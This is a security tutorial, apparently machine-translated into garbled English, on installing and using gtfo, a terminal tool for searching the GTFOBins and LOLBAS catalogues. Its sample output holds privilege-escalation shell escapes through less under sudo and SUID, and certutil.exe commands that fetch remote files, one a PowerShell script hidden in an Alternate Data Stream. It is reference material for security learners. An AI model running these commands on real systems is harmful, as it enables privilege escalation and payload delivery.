قالب وردپرس درنا توس
Home / Tips and Tricks / Use of Gtfo to search for abusive binary files during reuse «Null Byte :: WonderHowTo

Use of Gtfo to search for abusive binary files during reuse «Null Byte :: WonderHowTo



GTFOBins and LOLBAS are projects with the goal of documenting native binary files that can be respectfully abused and exploited by attackers on Unix and Windows systems. These binaries are often used to make a living on land during post-use. In this tutorial, we’re going to look at gtfo, a tool that can be used to search these projects for abusive binaries right from the command line.

What lives from the land?

Living on the land is a method used by attackers that leverages existing tools and features in the target environment to drive the attack forward. Goals include privilege escalation, sideways movement, persistence, data exfiltration, inverted shell spawning, and more.

This technique is great for flying under the radar and can be difficult for defenders to spot. Because many of these tools are used for legitimate management, it can be difficult to separate malicious activity from normal activity. Windows PowerShell is a good example. Although it has been abused by attackers for years, it is still a common vector after being exploited.

Another compelling reason malicious actors prefer native binaries is cost. In general, it is much more expensive and risky to develop custom tools that are labeled as flagged from the start. Especially when techniques can make life on the land worse, it is in an attacker̵

7;s interest to use what is already there.

GTFOBins and LOLBAS are undoubtedly excellent resources when it comes to abusing native binaries. However, sometimes it can be a chore to switch back and forth from within the browser. Gtfo is a tool written in Python that aims to provide all of the information these resources provide from the convenience of the terminal.

Install gtfo

To install gtfo we first need to clone the GitHub repository:

~# git clone https://github.com/mzfr/gtfo

Cloning into 'gtfo'...
remote: Enumerating objects: 56, done.
remote: Counting objects: 100% (56/56), done.
remote: Compressing objects: 100% (42/42), done.
remote: Total 56 (delta 21), reused 42 (delta 12), pack-reused 0
Unpacking objects: 100% (56/56), 317.52 KiB | 1.65 MiB/s, done.

Next, change to the newly created directory:

~# cd gtfo

Gtfo uses Python 3 so we need to use PIP3 Here. It can be installed with the following command:

~/gtfo# apt install python3-pip

Now we can install the necessary dependencies:

~/gtfo# pip3 install -r requirements.txt

Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (5.3.1)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (2.23.0)
Collecting bs4
  Downloading bs4-0.0.1.tar.gz (1.1 kB)
Requirement already satisfied: lxml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (4.5.2)
Collecting requests_cache
  Downloading requests_cache-0.5.2-py2.py3-none-any.whl (22 kB)
Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (0.8.2)
Requirement already satisfied: pyfiglet in /usr/lib/python3/dist-packages (from -r requirements.txt (line 7)) (0.8.post0)
Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (from bs4->-r requirements.txt (line 3)) (4.9.1)
Building wheels for collected packages: bs4
  Building wheel for bs4 (setup.py) ... done
  Created wheel for bs4: filename=bs4-0.0.1-py3-none-any.whl size=1272 sha256=2a0036256cc5bc7b34622abe1b56ff080f2829a0ae7cc2c858b079e0c9172e71
  Stored in directory: /root/.cache/pip/wheels/75/78/21/68b124549c9bdc94f822c02fb9aa3578a669843f9767776bca
Successfully built bs4
Installing collected packages: bs4, requests-cache
Successfully installed bs4-0.0.1 requests-cache-0.5.2

Now we can run gtfo with the dot-slash:

~/gtfo# ./gtfo

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})
gtfo: error: one of the arguments -b/--bins -e/--exe -w/--link -ls/--list is required

This gives us some brief usage information. We should be able to run this tool from anywhere on our system by creating a symbolic link to the executable. Navigate to / usr / local / bin to get started:

~/gtfo# cd /usr/local/bin/

And create a symbolic link called gtfo to the executable in the directory we previously cloned from GitHub:

~/usr/local/bin# ln -s ~/NB/gtfo/gtfo gtfo

Now we can run gtfo from any directory.

Using Gtfo to Find Binary Files

Use the option to display the help menu and optional arguments -H Flag:

~# gtfo -h

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})

optional arguments:
  -h, --help            show this help message and exit
  -b BINS, --bins BINS  Search binaries on GTFOBins
  -e EXE, --exe EXE     Search Windows exe on LOLBAS
  -w LINK, --link LINK  gtfobins link to the page
  -ls {bins,exe}, --list {bins,exe}
                        list all the available binaries

We can list the Unix binaries using the -ls Switch followed by the container Argument:

~# gtfo -ls bins

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

╒═════════════╤═══════════╤═══════════╤════════════╤═══════════╤══════════════╤═════════════╤══════════╤═══════════════════╤══════════╕
│ apt-get     │ apt       │ aria2c    │ arp        │ ash       │ awk          │ base32      │ base64   │ bash              │ bpftrace │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ bundler     │ busctl    │ busybox   │ byebug     │ cancel    │ cat          │ chmod       │ chown    │ chroot            │ cobc     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ cp          │ cpan      │ cpulimit  │ crash      │ crontab   │ csh          │ curl        │ cut      │ dash              │ date     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ dd          │ dialog    │ diff      │ dmesg      │ dmsetup   │ dnf          │ docker      │ dpkg     │ easy_install      │ eb       │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ ed          │ emacs     │ env       │ eqn        │ expand    │ expect       │ facter      │ file     │ find              │ finger   │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ flock       │ fmt       │ fold      │ ftp        │ gawk      │ gcc          │ gdb         │ gem      │ genisoimage       │ gimp     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ git         │ grep      │ gtester   │ hd         │ head      │ hexdump      │ highlight   │ iconv    │ iftop             │ ionice   │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ ip          │ irb       │ jjs       │ journalctl │ jq        │ jrunscript   │ ksh         │ ksshell  │ ld.so             │ ldconfig │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ less        │ logsave   │ look      │ ltrace     │ lua       │ lwp-download │ lwp-request │ mail     │ make              │ man      │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ mawk        │ more      │ mount     │ mtr        │ mv        │ mysql        │ nano        │ nawk     │ nc                │ nice     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ nl          │ nmap      │ node      │ nohup      │ nroff     │ nsenter      │ od          │ openssl  │ pdb               │ perl     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ pg          │ php       │ pic       │ pico       │ pip       │ pkexec       │ pry         │ puppet   │ python            │ rake     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ readelf     │ red       │ redcarpet │ restic     │ rlogin    │ rlwrap       │ rpm         │ rpmquery │ rsync             │ ruby     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ run-mailcap │ run-parts │ rview     │ rvim       │ scp       │ screen       │ script      │ sed      │ service           │ setarch  │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ sftp        │ shuf      │ smbclient │ socat      │ soelim    │ sort         │ sqlite3     │ ssh      │ start-stop-daemon │ stdbuf   │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ strace      │ strings   │ su        │ sysctl     │ systemctl │ tac          │ tail        │ tar      │ taskset           │ tclsh    │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ tcpdump     │ tee       │ telnet    │ tftp       │ time      │ timeout      │ tmux        │ top      │ ul                │ unexpand │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ uniq        │ unshare   │ uudecode  │ uuencode   │ valgrind  │ vi           │ view        │ vim      │ watch             │ wget     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ whois       │ wish      │ xargs     │ xxd        │ xz        │ yelp         │ yum         │ zip      │ zsh               │ zsoelim  │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ zypper      │           │           │            │           │              │             │          │                   │          │
╘═════════════╧═══════════╧═══════════╧════════════╧═══════════╧══════════════╧═════════════╧══════════╧═══════════════════╧══════════╛

This will output a nice table that contains all of the abusive binaries that can be found on GTFOBins.

Use the to list Windows binaries -ls Switch followed by the exe Argument:

~# gtfo -ls exe

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

╒═══════════════════╤══════════════════════╤═════════════════════════════════╤══════════════════════════════╤═══════════════════════╤════════════════════════╤══════════════════════════════╕
│ At.exe            │ Atbroker.exe         │ Bash.exe                        │ Bitsadmin.exe                │ CertReq.exe           │ Certutil.exe           │ Cmd.exe                      │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Cmdkey.exe        │ Cmstp.exe            │ Control.exe                     │ Csc.exe                      │ Cscript.exe           │ Desktopimgdownldr.exe  │ Dfsvc.exe                    │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Diantz.exe        │ Diskshadow.exe       │ Dnscmd.exe                      │ Esentutl.exe                 │ Eventvwr.exe          │ Expand.exe             │                              │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Extexport.exe     │ Extrac32.exe         │ Findstr.exe                     │ Forfiles.exe                 │ Ftp.exe               │ GfxDownloadWrapper.exe │ Gpscript.exe                 │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Hh.exe            │ Ie4uinit.exe         │ Ieexec.exe                      │ Ilasm.exe                    │ Infdefaultinstall.exe │ Installutil.exe        │ Jsc.exe                      │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Makecab.exe       │ Mavinject.exe        │ Microsoft.Workflow.Compiler.exe │ Mmc.exe                      │ MpCmdRun.exe          │ Msbuild.exe            │ Msconfig.exe                 │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Msdt.exe          │ Mshta.exe            │ Msiexec.exe                     │ Netsh.exe                    │ Odbcconf.exe          │ Pcalua.exe             │ Pcwrun.exe                   │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Pktmon.exe        │ Presentationhost.exe │ Print.exe                       │ Psr.exe                      │ Rasautou.exe          │ Reg.exe                │ Regasm.exe                   │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Regedit.exe       │ Regini.exe           │ Register-cimprovider.exe        │ Regsvcs.exe                  │ Regsvr32.exe          │ Replace.exe            │ Rpcping.exe                  │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Rundll32.exe      │ Runonce.exe          │ Runscripthelper.exe             │ Sc.exe                       │ Schtasks.exe          │ Scriptrunner.exe       │ SyncAppvPublishingServer.exe │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Ttdinject.exe     │ Tttracer.exe         │ vbc.exe                         │ Verclsid.exe                 │ Wab.exe               │ Wmic.exe               │ Wscript.exe                  │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Wsreset.exe       │ Xwizard.exe          │ Advpack.dll                     │ Comsvcs.dll                  │ Ieadvpack.dll         │ Ieaframe.dll           │ Mshtml.dll                   │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Pcwutl.dll        │ Setupapi.dll         │ Shdocvw.dll                     │ Shell32.dll                  │ Syssetup.dll          │ Url.dll                │ Zipfldr.dll                  │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ AgentExecutor.exe │ Appvlp.exe           │ Bginfo.exe                      │ Cdb.exe                      │ csi.exe               │ Devtoolslauncher.exe   │ dnx.exe                      │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Dotnet.exe        │ Dxcap.exe            │ Excel.exe                       │ Mftrace.exe                  │ Msdeploy.exe          │ msxsl.exe              │ ntdsutil.exe                 │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Powerpnt.exe      │ rcsi.exe             │ Sqldumper.exe                   │ Sqlps.exe                    │ SQLToolsPS.exe        │ Squirrel.exe           │ te.exe                       │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Tracker.exe       │ Update.exe           │ vsjitdebugger.exe               │ Winword.exe                  │ Wsl.exe               │ CL_Mutexverifiers.ps1  │ CL_Invocation.ps1            │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Manage-bde.wsf    │ Pubprn.vbs           │ Slmgr.vbs                       │ Syncappvpublishingserver.vbs │ winrm.vbs             │ Pester.bat             │                              │
╘═══════════════════╧══════════════════════╧═════════════════════════════════╧══════════════════════════════╧═══════════════════════╧════════════════════════╧══════════

This outputs a table that contains all of the abusive binaries that can be found on LOLBAS.

Use the key to get information about a specific binary file -b Flag. Here we see information about the Unix fewer Command:

~# gtfo -b less

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

Code:   less /etc/profile
        !/bin/sh

Type:   shell

Code:   VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
        v

Type:   shell

Code:   less file_to_read
Type:   file-read

# This is useful when `less` is used as a pager by another binary to read a different file.
Code:   less /etc/profile
        :e file_to_read

Type:   file-read

Code:   echo DATA | less
        sfile_to_write
        q

Type:   file-write

# This invokes the default editor to edit the file. The file must exist.
Code:   less file_to_write
        v

Type:   file-write

Code:   sudo less /etc/profile
        !/bin/sh

Type:   sudo

Code:   ./less file_to_read
Type:   suid

In the output we see the type of abuse and the corresponding code. This example includes code for sudo and SUID to get a shell and read and write files.

We can also get the link to the GTFOBins page with that -w Possibility:

~# gtfo -w less

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

--> less        -------------------->    https://gtfobins.github.io//gtfobins/less

Use the key to view information about a specific Windows binary file -e Flag. Please note that a distinction is made between upper and lower case and the extension is required. Here we see information about the Certutil.exe Program:

~# gtfo -e Certutil.exe

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

# Download and save 7zip to disk in the current folder.

CMD:            certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Category:       Download
Privileges:     User

# Download and save 7zip to disk in the current folder.

CMD:            certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Category:       Download
Privileges:     User

# Download and save a PS1 file to an Alternate Data Stream (ADS).

CMD:            certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:temp:ttt
Category:       ADS
Privileges:     User

# Command to encode a file using Base64

CMD:            certutil -encode inputFileName encodedOutputFileName
Category:       Encode
Privileges:     User

# Command to decode a Base64 encoded file.

CMD:            certutil -decode encodedInputFileName decodedOutputFileName
Category:       Decode
Privileges:     User

We can see the category, command, and required permissions in the output. This example includes commands for encrypting, decrypting, and downloading files.

We can also get the link to the LOLBAS page with that -w Possibility:

~# gtfo -w Certutil.exe

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

--> Certutil.exe        -------------------->    https://lolbas-project.github.io//lolbas/Binaries/Certutil

Wrap up

In this tutorial, we learned about the GTFOBins and LOLBAS projects and how incredibly useful they can be for learning about native binaries on Unix and Windows systems. We also explored gtfo, a tool that can be used to search these resources directly from the command line. As you can see, gtfo can be very useful for browsing abusive binaries without ever leaving the terminal.

Would you like to make money as a hacker with a white hat? Start your white hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and receive over 60 hours of training from ethical hacking professionals.

Buy now (90% discount)>

Cover image from ThisIsEngineering / Pexels

Source link